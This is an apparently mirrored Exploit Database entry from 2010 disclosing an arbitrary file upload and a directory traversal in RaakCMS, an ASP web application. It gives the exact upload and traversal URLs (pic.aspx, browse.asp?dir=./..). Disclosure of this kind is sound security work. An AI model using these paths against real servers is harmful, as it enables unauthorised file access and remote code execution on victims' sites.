RaakCMS – Multiple Vulnerabilities

• Exploit Database
• 10 阅读

• 作者： Pouya Daneshmand
  日期： 2010-02-01
• 类别：

  • webapps
  平台：

  • asp
• 来源：https://www.exploit-db.com/exploits/11310/

• #################################################################
  # Securitylab.ir
  #################################################################
  # Application Info:
  # Name: RaakCms
  # Vendor: http://raakcms.com
  #################################################################
  Vulnerability:
  =======================
  Arbitrary File Upload
  =======================
  http://server/webmaster/pic.aspx
  select file and folder , your file upload here:
  http://server/User_Images/[Folder]/FILE.ASPX
  
  =======================
  Directory Traversal
  =======================
  http://server/browse.asp?dir=./..
  http://server/browseFile.asp?dir=./..
  #################################################################
  
  #################################################################
  # Discoverd By: Pouya Daneshmand
  # Website: http://securitylab.ir
  # Contacts: info[at]securitylab.ir & whh_iran@yahoo.com<mailto:whh_iran@yahoo.com>
  ###################################################################